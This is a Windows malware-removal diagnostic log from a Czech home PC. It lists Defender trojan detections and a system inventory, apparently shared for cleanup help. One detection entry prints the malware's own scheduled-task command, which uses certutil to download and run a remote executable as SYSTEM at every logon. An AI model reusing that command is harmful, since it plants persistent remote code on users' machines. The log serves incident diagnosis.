Date: 2020-08-29 22:36:38.513
Description:
Antivirová ochrana v programu Windows Defender zjistil malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid ... terprise=0
Název: Trojan:Win32/Hynamer.C!ml
ID: 2147749152
Závažnost: Vážné
Kategorie: Trojský kůň
Cesta: file:_C:\Users\Milan\AppData\Roaming\3k52z4f5aim\et53zradlff.exe
Původ detekce: Místní počítač
Typ detekce: FastPath
Zdroj detekce: Systém
Uživatel: NT AUTHORITY\SYSTEM
Název procesu: Unknown
Verze bezpečnostních informací: AV: 1.323.90.0, AS: 1.323.90.0, NIS: 1.323.90.0
Verze modulu: AM: 1.1.17400.5, NIS: 1.1.17400.5
Date: 2020-08-29 22:36:38.510
Description:
Antivirová ochrana v programu Windows Defender zjistil malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid ... terprise=0
Název: Trojan:Win32/Wacatac.DB!ml
ID: 2147757790
Závažnost: Vážné
Kategorie: Trojský kůň
Cesta: file:_C:\Users\Milan\AppData\Local\Temp\lttfjp4yc3u\vujrxhyhkrm.exe
Původ detekce: Místní počítač
Typ detekce: FastPath
Zdroj detekce: Systém
Uživatel: NT AUTHORITY\SYSTEM
Název procesu: Unknown
Verze bezpečnostních informací: AV: 1.323.90.0, AS: 1.323.90.0, NIS: 1.323.90.0
Verze modulu: AM: 1.1.17400.5, NIS: 1.1.17400.5
Date: 2020-08-29 22:36:38.508
Description:
Antivirová ochrana v programu Windows Defender zjistil malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid ... terprise=0
Název: Trojan:Win32/Cryptinject!MTB
ID: 2147729037
Závažnost: Vážné
Kategorie: Trojský kůň
Cesta: file:_C:\Users\Milan\AppData\Local\Temp\dzekzdxxrlm\ifhvvyy.exe; file:_C:\Users\Milan\AppData\Local\Temp\r04v3ss32nl\ifhvvyy.exe
Původ detekce: Místní počítač
Typ detekce: FastPath
Zdroj detekce: Ochrana v reálném čase
Uživatel: DESKTOP-AJHPLSQ\Milan
Název procesu: C:\Program Files (x86)\oizjd\53280214.exe
Verze bezpečnostních informací: AV: 1.323.90.0, AS: 1.323.90.0, NIS: 1.323.90.0
Verze modulu: AM: 1.1.17400.5, NIS: 1.1.17400.5
Date: 2020-08-29 22:35:50.832
Description:
Antivirová ochrana v programu Windows Defender zjistil malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid ... terprise=0
Název: Trojan:Win32/Ceprolad.A
ID: 2147726914
Závažnost: Vážné
Kategorie: Trojský kůň
Cesta: CmdLine:_C:\Windows\System32\schtasks.exe /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR cmd.exe /C certutil.exe -urlcache -split -f https://bbistrovantonbb.com/app/app.exe C:\Users\Milan\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Milan\AppData\Local\Temp\csrss\scheduled.exe /31340 /TN ScheduledUpdate /F
Původ detekce: Neznámý
Typ detekce: Konkrétní
Zdroj detekce: Systém
Uživatel: NT AUTHORITY\SYSTEM
Název procesu: Unknown
Verze bezpečnostních informací: AV: 1.323.90.0, AS: 1.323.90.0, NIS: 1.323.90.0
Verze modulu: AM: 1.1.17400.5, NIS: 1.1.17400.5
CodeIntegrity:
===================================
Date: 2020-09-12 11:45:27.046
Description:
Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe) attempted to load \Device\HarddiskVolume2\Program Files\AVG\Antivirus\aswhook.dll that did not meet the Microsoft signing level requirements.
Date: 2020-09-12 11:45:26.975
Description:
Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe) attempted to load \Device\HarddiskVolume2\Program Files\AVG\Antivirus\aswhook.dll that did not meet the Microsoft signing level requirements.
Date: 2020-09-12 11:45:26.852
Description:
Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe) attempted to load \Device\HarddiskVolume2\Program Files\AVG\Antivirus\aswhook.dll that did not meet the Microsoft signing level requirements.
Date: 2020-09-12 11:45:26.713
Description:
Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe) attempted to load \Device\HarddiskVolume2\Program Files\AVG\Antivirus\aswhook.dll that did not meet the Microsoft signing level requirements.
Date: 2020-09-12 10:45:41.032
Description:
Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe) attempted to load \Device\HarddiskVolume2\Program Files\AVG\Antivirus\aswhook.dll that did not meet the Microsoft signing level requirements.
Date: 2020-09-12 10:45:26.797
Description:
Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe) attempted to load \Device\HarddiskVolume2\Program Files\AVG\Antivirus\aswhook.dll that did not meet the Microsoft signing level requirements.
Date: 2020-09-12 10:45:26.788
Description:
Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe) attempted to load \Device\HarddiskVolume2\Program Files\AVG\Antivirus\aswhook.dll that did not meet the Microsoft signing level requirements.
Date: 2020-09-12 10:45:26.504
Description:
Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe) attempted to load \Device\HarddiskVolume2\Program Files\AVG\Antivirus\aswhook.dll that did not meet the Microsoft signing level requirements.
==================== Memory info ===========================
BIOS: Award Software International, Inc. F3 07/28/2010
Motherboard: Gigabyte Technology Co., Ltd. GA-770T-D3L
Processor: AMD Athlon(tm) II X2 250 Processor
Percentage of memory in use: 32%
Total physical RAM: 12285.55 MB
Available physical RAM: 8233.7 MB
Total Virtual: 14141.55 MB
Available Virtual: 8472.37 MB
==================== Drives ================================
Drive c: () (Fixed) (Total:476.31 GB) (Free:278 GB) NTFS
Drive e: (HDD-1000) (Fixed) (Total:931.51 GB) (Free:737.23 GB) NTFS
Drive f: (ZelenyHDD) (Fixed) (Total:465.76 GB) (Free:28.95 GB) NTFS
Drive g: (Car Mechanic Simulator 2018 Merc) (CDROM) (Total:7.51 GB) (Free:0 GB) UDF
\\?\Volume{5d2f0ce6-0000-0000-0000-100000000000}\ (Rezervováno systémem) (Fixed) (Total:0.1 GB) (Free:0.06 GB) NTFS
\\?\Volume{5d2f0ce6-0000-0000-0000-101a77000000}\ () (Fixed) (Total:0.53 GB) (Free:0.08 GB) NTFS
==================== MBR & Partition Table ====================
==========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 476.9 GB) (Disk ID: 5D2F0CE6)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=476.3 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=543 MB) - (Type=27)
==========================================================
Disk: 1 (Size: 931.5 GB) (Disk ID: 8C19AC0D)
Partition: GPT.
==========================================================
Disk: 2 (MBR Code: Windows 7 or Vista) (Size: 465.8 GB) (Disk ID: BFAA9354)
Partition 1: (Active) - (Size=465.8 GB) - (Type=07 NTFS)
==================== End of Addition.txt =======================
Ran by Milan (12-09-2020 11:54:24)
Running from C:\Users\Milan\Desktop
Windows 10 Home Version 1909 18363.1016 (X64) (2020-03-20 21:25:00)
Boot Mode: Normal
==========================================================
==================== Accounts: =============================
Administrator (S-1-5-21-1738925715-1269715944-3180472622-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-1738925715-1269715944-3180472622-503 - Limited - Disabled)
Guest (S-1-5-21-1738925715-1269715944-3180472622-501 - Limited - Disabled)
Milan (S-1-5-21-1738925715-1269715944-3180472622-1001 - Administrator - Enabled) => C:\Users\Milan
WDAGUtilityAccount (S-1-5-21-1738925715-1269715944-3180472622-504 - Limited - Disabled)
==================== Security Center ========================
(If an entry is included in the fixlist, it will be removed.)
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: AVG Antivirus (Enabled - Up to date) {18A975F9-A60C-37D8-E30B-4BEF31AD3411}
==================== Installed Programs ======================
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
Adobe Flash Player 32 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 32.0.0.433 - Adobe)
AnyDesk (HKLM-x32\...\AnyDesk) (Version: ad 6.0.7 - philandro Software GmbH)
AVG AntiVirus FREE (HKLM-x32\...\AVG Antivirus) (Version: 20.6.3135 - AVG Technologies)
AVG Secure Browser (HKLM-x32\...\AVG Secure Browser) (Version: 85.0.5675.85 - Autoři prohlížeče AVG Secure Browser)
AVG Update Helper (HKLM-x32\...\{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}) (Version: 1.8.1066.0 - AVG Technologies) Hidden
Car Mechanic Simulator 2018 Mercedes Benz (HKLM-x32\...\Car Mechanic Simulator 2018 Mercedes Benz_is1) (Version: - )
CCleaner (HKLM\...\CCleaner) (Version: 5.52 - Piriform)
DAEMON Tools Ultra (HKLM\...\DAEMON Tools Ultra) (Version: 5.4.1.0928 - Disc Soft Ltd)
Dark Konflict (HKLM-x32\...\Dark Konflict) (Version: - )
Defraggler (HKLM\...\Defraggler) (Version: 2.22 - Piriform)
Epson Scan 2 (HKLM-x32\...\Epson Scan 2) (Version: - Seiko Epson Corporation)
EPSON Scan OCR Component (HKLM-x32\...\{563B99D8-8895-4E3E-AE8D-15BE8C05F1C1}) (Version: 3.00.04 - SEIKO EPSON Corp.)
EPSON Scan PDF Extensions (HKLM-x32\...\{F9956472-6E16-4F83-BF9A-F887EF4A45B7}) (Version: 1.03.0001 - SEIKO EPSON Corp.)
EpsonNet Print (HKLM\...\{96ED1D58-440C-4345-8FEE-C4781366C67F}) (Version: 3.1.4.0 - SEIKO EPSON Corporation)
Euro Truck Simulator 2 v1.35.3.4S (HKLM-x32\...\tuttop.com Euro Truck Simulator 2 v1.35.3.4S_is1) (Version: 1.35.3.4S - tuttop.com)
HELLGATE London (HKLM-x32\...\HELLGATE London_is1) (Version: - )
Java 8 Update 261 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180261F0}) (Version: 8.0.2610.12 - Oracle Corporation)
JDownloader 2 (HKLM\...\jdownloader2) (Version: 2.0 - AppWork GmbH)
Microsoft Edge (HKLM-x32\...\Microsoft Edge) (Version: 85.0.564.51 - Microsoft Corporation)
Microsoft Edge Update (HKLM-x32\...\Microsoft Edge Update) (Version: 1.3.135.29 - )
Microsoft Office Enterprise 2007 (HKLM-x32\...\ENTERPRISE) (Version: 12.0.4518.1014 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-1738925715-1269715944-3180472622-1001\...\OneDriveSetup.exe) (Version: 20.143.0716.0003 - Microsoft Corporation)
Microsoft Update Health Tools (HKLM\...\{406C9ADB-1325-4FD0-9D13-C119CFF64E0A}) (Version: 2.65.0.0 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{a2199617-3609-410f-a8e8-e8806c73545b}) (Version: 11.0.61030.0 - Корпорация Майкрософт)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{f0080ca2-80ae-4958-b6eb-e8fa916d744a}) (Version: 11.0.61030.0 - Корпорация Майкрософт)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{1a63c099-febd-4eaf-83ad-a82ea4fdac49}) (Version: 12.0.30501.0 - Корпорация Майкрософт)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{b55f7208-e02b-4828-ac78-59c73ddf5bc7}) (Version: 12.0.30501.0 - Корпорация Майкрософт)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.23026 (HKLM-x32\...\{e46eca4f-393b-40df-9f49-076faf788d83}) (Version: 14.0.23026.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation)
Mockba to Berlin (HKLM-x32\...\{BCECC8FA-31AD-487A-A8C4-1C9C5454F9C6}_is1) (Version: 2.17 - US - ACTION, s.r.o.)
Mozilla Firefox 80.0.1 (x64 cs) (HKLM\...\Mozilla Firefox 80.0.1 (x64 cs)) (Version: 80.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 69.0 - Mozilla)
NVIDIA Ovladače grafiky 432.00 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 432.00 - NVIDIA Corporation)
NVIDIA PhysX (HKLM-x32\...\{B9DB4C76-01A4-46D5-8910-F7AA6376DBAF}) (Version: 9.10.0514 - NVIDIA Corporation)
Odinstalace tiskárny EPSON L3150 Series (HKLM\...\EPSON L3150 Series) (Version: - Seiko Epson Corporation)
Original War (HKLM-x32\...\Original War) (Version: - )
Příručky společnosti EPSON (HKLM-x32\...\{84CECC1B-21EF-41B1-9A91-3E724E5D99D3}) (Version: 1.56.1.0 - Seiko Epson Corporation)
S.T.A.L.K.E.R. Clear Sky (HKLM-x32\...\GOGPACKSTALKERSTCS_is1) (Version: 2.0.0.8 - GOG.com)
Siegecraft Commander (HKLM-x32\...\Siegecraft Commander_is1) (Version: - )
Skype verze 8.64 (HKLM-x32\...\Skype_is1) (Version: 8.64 - Skype Technologies S.A.)
Sniper Elite (HKLM-x32\...\{2527736B-927C-4E5F-A861-6BA616568B80}_is1) (Version: 1.0 - US - ACTION, s.r.o.)
Sorades - Die Befreiung (HKLM-x32\...\Sorades - Die Befreiung) (Version: 1.0 - diebefreiung.de)
SpeedFan (remove only) (HKLM-x32\...\SpeedFan) (Version: - )
Spintires Chernobyl (HKLM-x32\...\Spintires Chernobyl_is1) (Version: - )
Splitter 9.6.0.1 (HKLM-x32\...\WAV MP3 Splitter_is1) (Version: 9.6.0.1 - Piston Software)
Surviving Mars (HKLM-x32\...\Surviving Mars_is1) (Version: - )
TeamSpeak 3 Client (HKLM-x32\...\TeamSpeak 3 Client) (Version: 3.5.0 - TeamSpeak Systems GmbH)
The Colonists (HKLM-x32\...\1282350952_is1) (Version: V1 - GOG.com)
The Sinking City (HKLM-x32\...\The Sinking City_is1) (Version: 0.0.0 - THE KNIGHT)
The Subject (HKLM-x32\...\The Subject_is1) (Version: - )
Total Commander 64-bit (Remove or Repair) (HKLM\...\Totalcmd64) (Version: 8.51a - Ghisler Software GmbH)
Train Valley 2 Passenger Flow (HKLM-x32\...\Train Valley 2 Passenger Flow_is1) (Version: - )
VLC media player (HKLM-x32\...\VLC media player) (Version: 3.0.11 - VideoLAN)
WinRAR 5.40 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.40.0 - win.rar GmbH)
Packages:
=========
Bubble Witch 3 Saga -> C:\Program Files\WindowsApps\king.com.BubbleWitch3Saga_6.12.4.0_x86__kgqvnymyfvs32 [2020-08-29] (king.com)
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x64__8wekyb3d8bbwe [2020-08-29] (Microsoft Corporation) [MS Ad]
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x86__8wekyb3d8bbwe [2020-08-29] (Microsoft Corporation) [MS Ad]
Microsoft Solitaire Collection -> C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.7.8101.0_x64__8wekyb3d8bbwe [2020-08-29] (Microsoft Studios) [MS Ad]
MSN Počasí -> C:\Program Files\WindowsApps\Microsoft.BingWeather_4.36.20714.0_x64__8wekyb3d8bbwe [2020-08-29] (Microsoft Corporation) [MS Ad]
NVIDIA Control Panel -> C:\Program Files\WindowsApps\NVIDIACorp.NVIDIAControlPanel_8.1.958.0_x64__56jybvy8sckqj [2020-08-29] (NVIDIA Corp.)
==================== Custom CLSID (Whitelisted): ==============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
ContextMenuHandlers1: [AVG] -> {472083B1-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVG\Antivirus\ashShell.dll [2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
ContextMenuHandlers1: [DefragglerShellExtension] -> {4380C993-0C43-4E02-9A7A-0D40B6EA7590} => C:\Program Files\Defraggler\DefragglerShell64.dll [2018-05-02] (Piriform Ltd -> Piriform Ltd)
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2016-08-15] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2016-08-15] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers2: [DaemonShellExtDriveUltra] -> {F0E53CA3-02F8-40AE-9470-309F0309036F} => C:\Program Files\DAEMON Tools Ultra\DTShl64.dll [2018-11-29] (AVB Disc Soft, SIA -> Disc Soft Ltd)
ContextMenuHandlers3: [DaemonShellExtImageUltra] -> {B5EBA666-2B94-4C7A-9CAA-A4539F329646} => C:\Program Files\DAEMON Tools Ultra\DTShl64.dll [2018-11-29] (AVB Disc Soft, SIA -> Disc Soft Ltd)
ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\WINDOWS\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_90685a092bcf58c7\nvshext.dll [2019-10-04] (NVIDIA Corporation -> NVIDIA Corporation)
ContextMenuHandlers6: [AVG] -> {472083B1-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVG\Antivirus\ashShell.dll [2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
ContextMenuHandlers6: [DefragglerShellExtension] -> {4380C993-0C43-4E02-9A7A-0D40B6EA7590} => C:\Program Files\Defraggler\DefragglerShell64.dll [2018-05-02] (Piriform Ltd -> Piriform Ltd)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2016-08-15] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2016-08-15] (win.rar GmbH -> Alexander Roshal)
==================== Codecs (Whitelisted) ====================
==================== Shortcuts & WMI ========================
==================== Loaded Modules (Whitelisted) =============
2020-03-21 10:40 - 2020-09-08 18:46 - 002072064 _____ () [File not signed] C:\Program Files (x86)\Microsoft\Skype for Desktop\ffmpeg.dll
2020-03-21 10:40 - 2020-09-08 18:46 - 000310784 _____ () [File not signed] C:\Program Files (x86)\Microsoft\Skype for Desktop\libegl.dll
2020-03-21 10:40 - 2020-09-08 18:46 - 006903808 _____ () [File not signed] C:\Program Files (x86)\Microsoft\Skype for Desktop\libglesv2.dll
2020-08-15 08:36 - 2020-08-15 08:36 - 003230720 _____ () [File not signed] C:\WINDOWS\assembly\NativeImages_v4.0.30319_64\DotNetCommon\1ff547e9235b59188e9fe052625211ac\DotNetCommon.ni.dll
2018-11-29 14:21 - 2018-12-18 09:48 - 006142320 _____ (AVB Disc Soft, SIA -> Disc Soft Ltd) [File not signed] C:\Program Files\DAEMON Tools Ultra\engine.dll
2020-08-15 08:35 - 2020-08-15 08:35 - 004807680 _____ (Disc Soft Ltd) [File not signed] C:\WINDOWS\assembly\NativeImages_v4.0.30319_64\DiscSoft.NET.Common\5eaf8b2270226ec230b3f2ddb6c2aeb0\DiscSoft.NET.Common.ni.dll
2016-09-14 14:31 - 2016-09-14 14:31 - 000500736 ____S (SEIKO EPSON CORPORATION) [File not signed] C:\WINDOWS\System32\enppmon.dll
==================== Alternate Data Streams (Whitelisted) ========
==================== Safe Mode (Whitelisted) ==================
==================== Association (Whitelisted) =================
==================== Internet Explorer trusted/restricted ==========
(If an entry is included in the fixlist, it will be removed from the registry.)
IE trusted site: HKU\S-1-5-21-1738925715-1269715944-3180472622-1001\...\localhost -> localhost
==================== Hosts content: =========================
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
2019-03-19 06:49 - 2020-09-11 20:05 - 000000841 _____ C:\WINDOWS\system32\drivers\etc\hosts
127.0.0.1 localhost
==================== Other Areas ===========================
(Currently there is no automatic fix for this section.)
HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> C:\Program Files (x86)\NVIDIA Corporation\PhysX\Common;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;%SYSTEMROOT%\System32\OpenSSH\
HKU\S-1-5-21-1738925715-1269715944-3180472622-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\Milan\AppData\Roaming\Microsoft\Windows Photo Viewer\Tapeta programu Windows Prohlížeč fotografií.jpg
DNS Servers: 213.46.172.37 - 213.46.172.36
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: )
Windows Firewall is enabled.
==================== MSCONFIG/TASK MANAGER disabled items ==
==================== FirewallRules (Whitelisted) ================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
FirewallRules: [{AF110A0F-4670-4C4D-BEE8-E19734C4583D}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{9C06B5BB-EDC4-4D95-B199-0729186F7C06}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{35FE486C-13A8-4115-91BE-EADD94521488}] => (Allow) C:\Program Files\DAEMON Tools Ultra\DiscSoftBusServiceUltra.exe (AVB Disc Soft, SIA -> Disc Soft Ltd)
FirewallRules: [TCP Query User{F4F5C31D-2AD9-4221-AC18-FD1AD4803957}C:\program files (x86)\java\jre1.8.0_241\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_241\bin\javaw.exe => No File
FirewallRules: [UDP Query User{7D5CA960-632A-4490-90D3-4E2015621578}C:\program files (x86)\java\jre1.8.0_241\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_241\bin\javaw.exe => No File
FirewallRules: [{262D1130-0562-4ABD-9DBE-BD7A36B75E21}] => (Allow) C:\Program Files\CCleaner\CCUpdate.exe (Piriform Software Ltd -> Piriform Software Ltd)
FirewallRules: [{D223F931-EC0B-418D-9CA1-86DED4F80FF0}] => (Allow) C:\Program Files\CCleaner\CCUpdate.exe (Piriform Software Ltd -> Piriform Software Ltd)
FirewallRules: [{9B85BCFD-5637-46EF-A544-F5CDD031E56D}] => (Allow) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{25501F14-C7E3-49B5-8AA0-F411A214A2BB}] => (Allow) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [TCP Query User{A3EBED2B-E21A-49AB-BEA3-6FB81621A465}E:\hry\stronghold 2\stronghold2.exe] => (Allow) E:\hry\stronghold 2\stronghold2.exe (Firefly Studios) [File not signed]
FirewallRules: [UDP Query User{B51E31E2-FC04-4595-B7AB-A56857E725E5}E:\hry\stronghold 2\stronghold2.exe] => (Allow) E:\hry\stronghold 2\stronghold2.exe (Firefly Studios) [File not signed]
FirewallRules: [TCP Query User{3382E28A-DDFD-4360-9788-92E872305F04}C:\program files (x86)\java\jre1.8.0_241\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_241\bin\javaw.exe => No File
FirewallRules: [UDP Query User{6D1B39C0-8474-4A82-A16B-37A2B363067E}C:\program files (x86)\java\jre1.8.0_241\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_241\bin\javaw.exe => No File
FirewallRules: [TCP Query User{FA9AB6ED-0A91-4065-8E02-AB57F96CA02A}E:\hry\foundation\foundation.exe] => (Allow) E:\hry\foundation\foundation.exe (Polymorph Games) [File not signed]
FirewallRules: [UDP Query User{F35B841D-2C85-46D4-9B66-2CC2D1A4A33D}E:\hry\foundation\foundation.exe] => (Allow) E:\hry\foundation\foundation.exe (Polymorph Games) [File not signed]
FirewallRules: [TCP Query User{47D6DBFB-0BBF-4425-8906-78FA4190532B}E:\games\surviving mars\marssteam.exe] => (Allow) E:\games\surviving mars\marssteam.exe (Haemimont Games AD -> Haemimont Games)
FirewallRules: [UDP Query User{D5D966E3-E806-4944-8A51-2B58DF1551EE}E:\games\surviving mars\marssteam.exe] => (Allow) E:\games\surviving mars\marssteam.exe (Haemimont Games AD -> Haemimont Games)
FirewallRules: [{0A47C543-177F-4283-B753-89601E79F3E0}] => (Allow) C:\Program Files (x86)\AnyDesk\AnyDesk.exe (philandro Software GmbH -> philandro Software GmbH)
FirewallRules: [{6608746E-BB0D-4940-80AE-71255BADFC02}] => (Allow) C:\Program Files (x86)\AnyDesk\AnyDesk.exe (philandro Software GmbH -> philandro Software GmbH)
FirewallRules: [{E95688B6-E055-4354-9794-DC2A141C37A9}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.63.76.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{9C304D1E-B5CB-412A-AF72-2E84EE6DCDF1}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.63.76.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{A50B23FA-CD55-4336-AD45-9DE5FF6B2823}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.63.76.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{9D976B0F-3F56-4B50-9E8E-0DA017F266E9}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.63.76.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{D9B09C69-0FBB-4B86-A187-7F523BE921BD}] => (Allow) C:\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe (AVG Technologies USA, LLC -> AVG Technologies)
FirewallRules: [{B4A64F44-B7A6-4440-999A-5FFAAEF842CE}] => (Allow) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{E81F9AC5-5422-4213-958F-C5671008BBC2}] => (Allow) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{E1DE6D90-F22C-4068-AAA3-43F04E202799}] => (Allow) C:\Program Files (x86)\AnyDesk\AnyDesk.exe (philandro Software GmbH -> philandro Software GmbH)
FirewallRules: [{53461AB8-456B-4316-A4FF-8E6FE5C227AB}] => (Allow) C:\Program Files (x86)\AnyDesk\AnyDesk.exe (philandro Software GmbH -> philandro Software GmbH)
FirewallRules: [{597C036D-4FC6-4760-B669-D78127F67E97}] => (Allow) C:\Program Files (x86)\AnyDesk\AnyDesk.exe (philandro Software GmbH -> philandro Software GmbH)
FirewallRules: [{04A7F879-86AF-41FD-A67F-CD9805DD2D4F}] => (Allow) C:\Program Files (x86)\AnyDesk\AnyDesk.exe (philandro Software GmbH -> philandro Software GmbH)
==================== Restore Points =========================
28-08-2020 22:33:27 Naplánovaný kontrolní bod
29-08-2020 18:01:40 Operace obnovení
08-09-2020 17:10:36 Naplánovaný kontrolní bod
11-09-2020 20:03:34 zoek.exe restore point
11-09-2020 21:46:05 JRT Pre-Junkware Removal
==================== Faulty Device Manager Devices ============
==================== Event log errors: ========================
Application errors:
==================
Error: (09/11/2020 10:11:31 PM) (Source: ESENT) (EventID: 481) (User: )
Description: taskhostw (3028,G,0) Pokus o čtení ze souboru C:\Users\Milan\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat na posunu 65536 (0x0000000000010000) o 65536 (0x00010000) bajtů po 0.000 sekundách selhal. Došlo k systémové chybě 5 (0x00000005): Přístup byl odepřen. . Operace čtení selže a dojde k chybě -1032 (0xfffffbf8). Pokud s tím budou dál problémy, může být soubor poškozený a budete ho možná muset obnovit z předchozí zálohy.
Error: (09/11/2020 10:11:31 PM) (Source: ESENT) (EventID: 481) (User: )
